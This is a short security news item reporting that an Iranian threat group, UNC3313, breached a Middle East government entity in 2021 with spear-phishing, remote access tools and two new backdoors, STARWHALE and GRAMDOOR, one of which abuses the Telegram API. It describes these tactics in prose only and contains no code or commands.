Security News > 2022 > February > Iranian Hackers Using New Spying Malware That Abuses Telegram Messenger API

An Iranian geopolitical nexus threat actor has been uncovered deploying two new targeted malware that come with "Simple" backdoor functionalities as part of an intrusion against an unnamed Middle East government entity in November 2021.

The attacks are said to have been orchestrated via spear-phishing messages to gain initial access, followed by taking advantage of publicly available offensive security tools and remote access software for lateral movement and maintaining access to the environment.

"UNC3313 moved rapidly to establish remote access by using ScreenConnect to infiltrate systems within an hour of initial compromise," the researchers noted, adding the security incident was quickly contained and remediated.

Subsequent phases of the attack involved escalating privileges, carrying out internal reconnaissance on the targeted network, and running obfuscated PowerShell commands to download additional tools and payloads on remote systems.

Also observed was a previously undocumented backdoor called STARWHALE, a Windows Script File that executes commands received commands from a hardcoded command-and-control server via HTTP. Another implant delivered during the course of the attack is GRAMDOOR, so named owing to its use of the Telegram API for its network communications with the attacker-controlled server in a bid to evade detection, once again highlighting the use of communication tools for facilitating exfiltration of data.

The findings also coincide with a new joint advisory from cybersecurity agencies from the U.K. and the U.S., accusing the MuddyWater group of espionage attacks targeting the defense, local government, oil and natural gas and telecommunications sectors across the globe.

News URL

https://thehackernews.com/2022/02/iranian-hackers-using-new-spying.html